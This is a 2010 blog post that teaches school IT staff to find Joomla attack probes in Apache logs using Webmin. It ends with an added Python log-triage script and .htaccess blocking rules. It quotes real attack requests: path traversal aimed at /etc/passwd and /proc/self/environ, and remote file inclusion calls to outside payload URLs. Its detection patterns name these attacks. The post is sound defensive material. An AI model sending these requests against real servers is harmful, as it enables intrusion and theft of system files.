IF you run a Joomla ...

Written by Ken Task
Wednesday, 02 June 2010 18:10

Often when discussing/cussing the security of operating systems, Windows folks point out that the most popular platform will draw the attention of those who would do harm, because there's more 'bang for the buck'. That's true of open-source apps too. And since many ISDs have firewalls, port 80 is one of the few ports open into the inner ISD network, so a Joomla site (or anything else listening on port 80) is a potential target. Now that school is out … maybe little johnny hacker will be more inclined to try out some stuff, too!
Got Joomla with some add-ons installed? When's the last time you checked on the versions of those add-ons? When's the last time you paid attention to logwatch reports (the web server section) and investigated? Might be time you did! There are active scans/probes looking for weak/vulnerable Joomla add-ons, and IF your Joomla is not up to the latest version, 1.5.18, and IF those add-ons have issues, your site is in danger of getting rootkitted.

The following is for Linux boxen with Webmin installed.

How to check activity:

1. Log in to your Webmin.
2. Go to System -> System Logs.
3. Click the "View" link for the /var/log/httpd/access_log line. The view will show the last 20 lines of that log.
4. To see what/who is probing your server, change the "Last" number from 20 to 200000, and in the "Only show lines with text" box type: ../../../
5. Then click "Refresh".

First … DON'T PANIC! You might be seeing just a probe, and your server is NOT in danger at all. BUT some investigation is in order, for if the probes point to a vulnerable add-on, you might have a problem.
What you'll see is something like below:

137.118.32.10 - - [23/May/2010:08:27:47 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 1390 "-" "libwww-perl/5.831"
137.118.32.10 - - [23/May/2010:08:43:04 -0500] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 1390 "-" "libwww-perl/5.831"
137.118.32.10 - - [23/May/2010:08:43:04 -0500] "GET /index2.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 1390 "-" "libwww-perl/5.831"
137.118.32.10 - - [23/May/2010:08:43:04 -0500] "GET /index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 1390 "-" "libwww-perl/5.831"
137.118.32.10 - - [23/May/2010:08:43:04 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 1390 "-" "libwww-perl/5.831"

Explanation: Note that in the example above, the server returned 404 responses. 404 is "not found". But, given the example, that could simply mean the server from which this clip was taken isn't running the Joomla add-on com_fabrik. Also note that it was probing for /proc/self/environ, which is just information … but information they shouldn't be seeing anyway, so there is reason for concern. Any activity such as the above is bad, but here's an example of ones that should raise your eyebrows!
174.37.246.234 - - [15/May/2010:15:43:30 -0500] "GET /index.php?option=com_contact=/../../../../../../../etc/passwd%00 HTTP/1.1" 404 1390 "-" "libwww-perl/5.834"
174.37.246.234 - - [15/May/2010:15:43:30 -0500] "GET /index.php?option=com_contact=/../../../../../../../etc/passwd%00 HTTP/1.1" 404 1390 "-" "libwww-perl/5.834"
174.37.246.234 - - [15/May/2010:15:43:30 -0500] "GET /index.php?option=com_docman=/../../../../../../../etc/passwd%00 HTTP/1.1" 404 1390 "-" "libwww-perl/5.834"
174.37.246.234 - - [15/May/2010:15:43:30 -0500] "GET /index.php?option=com_content=/../../../../../../../etc/passwd%00 HTTP/1.1" 404 1390 "-" "libwww-perl/5.834"
174.37.246.234 - - [15/May/2010:15:43:30 -0500] "GET /index.php?option=com_content=/../../../../../../../etc/passwd%00 HTTP/1.1" 404 1390 "-" "libwww-perl/5.834"
174.37.246.234 - - [15/May/2010:15:43:30 -0500] "GET /index.php?option=com_content=/../../../../../../../etc/passwd%00 HTTP/1.1" 404 1390 "-" "libwww-perl/5.834"

Explanation: Again note: 404s, but notice what they are seeking … /etc/passwd. Now we're getting more serious, huh?

Lines like this one could indicate a problem:

121.190.102.21 - - [21/May/2010:07:25:13 -0500] "GET /////////?cmd&file=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 200 30597 "-" "Mozilla/5.0"

or this one:

65.60.53.122 - - [31/May/2010:11:18:55 -0500] "GET /////////?cmd&file=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 200 29958 "-" "Mozilla/5.0"

NOTE: a 200 code … in this case, that's not good. bellschool.net is another Joomla site, located overseas.

Solutions:

1. Make sure that any com_ component you see installed is at its latest version. IF it's not the latest version and you can't find an update for it, consider removing the component/add-on.
2. You could start either:
a. using .htaccess deny/allow to block IP ranges, or maybe entire countries, from accessing your web server; or
b.
check into using mod_rewrite and rules for libwww-perl, to deny or return "gone" responses to requests that identify the browser agent as libwww-perl.

See: Time for some Joomla Spring Cleaning? SOSSIG http://sos.tcea.org/index.php?option=com_content&view=article&id=540:time-for-some-joomla-spring-cleaning&catid=96:joomla-tips&Itemid=338 or SOSTX http://www.sosoftexas.org/joomla15/index.php?option=com_content&view=article&id=466:time-for-some-joomla-spring-cleaning&catid=71:joomla-tips&Itemid=201 for more info and links.
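Automating the Webmin log review above (the ../../../ filter, the 404-versus-200 distinction, and the libwww-perl agent that solution 2b singles out), as an added example that is not part of the original article: a Python script that parses Apache combined-format access_log lines, tags each of the indicators the article points at, and flags a hostile request that was answered with 200 for investigation. The log lines embedded in it are constructed for the example (RFC 5737 documentation addresses and a made-up payload host, not copied from a real server), and the tag names and the severity rule are this example's own choices, not the article's.

```python
import re
from collections import Counter
from urllib.parse import unquote, parse_qsl

# Apache "combined" LogFormat, which is what /var/log/httpd/access_log uses on
# a default Red Hat / CentOS httpd install.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Files the probes in the article were reaching for; a request naming them is hostile.
SENSITIVE_PATHS = ("/etc/passwd", "/proc/self/environ")

# Constructed sample lines (not from a real server): documentation addresses and a
# made-up payload host stand in for the real ones shown in the article.
SAMPLE_LOG = """\
192.0.2.10 - - [23/May/2010:08:27:47 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../proc/self/environ%00 HTTP/1.1" 404 1390 "-" "libwww-perl/5.831"
192.0.2.11 - - [15/May/2010:15:43:30 -0500] "GET /index.php?option=com_content=/../../../../etc/passwd%00 HTTP/1.1" 404 1390 "-" "libwww-perl/5.834"
192.0.2.12 - - [21/May/2010:07:25:13 -0500] "GET /////////?cmd&file=http://payload-host.example/1.txt??? HTTP/1.1" 200 30597 "-" "Mozilla/5.0"
198.51.100.5 - - [21/May/2010:07:30:00 -0500] "GET /index.php?option=com_content&view=article&id=12 HTTP/1.1" 200 8842 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line.strip())
    if m is None:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    # Decode %2e%2e%2f-style escapes and %00 so the checks see what PHP would see.
    rec["decoded"] = unquote(rec["path"])
    return rec


def classify(rec):
    """Return the indicator tags (in a fixed order) for one parsed record."""
    tags = []
    decoded = rec["decoded"]
    if "../" in decoded:
        tags.append("traversal")
    if "\x00" in decoded:
        tags.append("null-byte")  # the %00 used to cut a file name short
    for target in SENSITIVE_PATHS:
        if target in decoded:
            tags.append("target:" + target)
    # Remote file inclusion attempt: a query value that is itself a URL.
    query = decoded.partition("?")[2]
    for _, value in parse_qsl(query, keep_blank_values=True):
        if value.lower().startswith(("http://", "https://", "ftp://")):
            tags.append("remote-include")
            break
    if "libwww-perl" in rec["ua"]:
        tags.append("scanner-ua")
    return tags


def triage(lines):
    """Return (ip, status, tags, verdict) for every line that carries an indicator."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        tags = classify(rec)
        if not tags:
            continue
        # A 404 means the add-on or file was not there: a probe, worth watching.
        # A 200 to a traversal or remote-include request means something answered it.
        hostile = "traversal" in tags or "remote-include" in tags
        verdict = "INVESTIGATE" if rec["status"] == 200 and hostile else "probe"
        findings.append((rec["ip"], rec["status"], tags, verdict))
    return findings


def sources(findings):
    """Count findings per source address, the input for an .htaccess deny list."""
    return dict(Counter(ip for ip, _, _, _ in findings))


if __name__ == "__main__":
    for ip, status, tags, verdict in triage(SAMPLE_LOG.splitlines()):
        print(f"{verdict:12} {ip:15} {status} {' '.join(tags)}")
```

Run it against the real file with `triage(open("/var/log/httpd/access_log"))` to get the same view Webmin gives, minus the scrolling; `sources()` tells you which addresses to consider for solution 2a. The "probe" verdict on a 404 matches the article's advice (note it, check the add-on, don't panic); a 200 to a remote-include request is the case the article marks as "not good" and is the line to chase down first.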
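The two mitigations under solution 2, written out as an added example (not configuration from the article or from the SOSSIG/SOSTX pages it links): Apache 2.2 .htaccess directives, which is what a 2010-era Red Hat/CentOS host runs. The address range is a placeholder documentation range; substitute the ranges your own log review turns up.

```apache
# Solution 2b: answer libwww-perl clients with 410 Gone instead of serving the page.
# Needs mod_rewrite loaded and AllowOverride FileInfo for this directory.
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} ^libwww-perl [NC]
# [G] sends 410 Gone; use [F] instead for a plain 403 Forbidden.
RewriteRule .* - [G,L]

# Solution 2a: deny a probing address range (Apache 2.2 syntax; needs AllowOverride Limit).
# 192.0.2.0/24 is a placeholder documentation range, not a real attacker.
Order Allow,Deny
Allow from all
Deny from 192.0.2.0/24
```

On Apache 2.4 the Order/Allow/Deny block becomes `Require all granted` and `Require not ip 192.0.2.0/24` inside a `<RequireAll>` container. A User-Agent string is trivially changed, so the rewrite rule cuts the noise from off-the-shelf scanners rather than stopping a determined one; solution 1 (keeping the components updated or removing them) is still the actual fix.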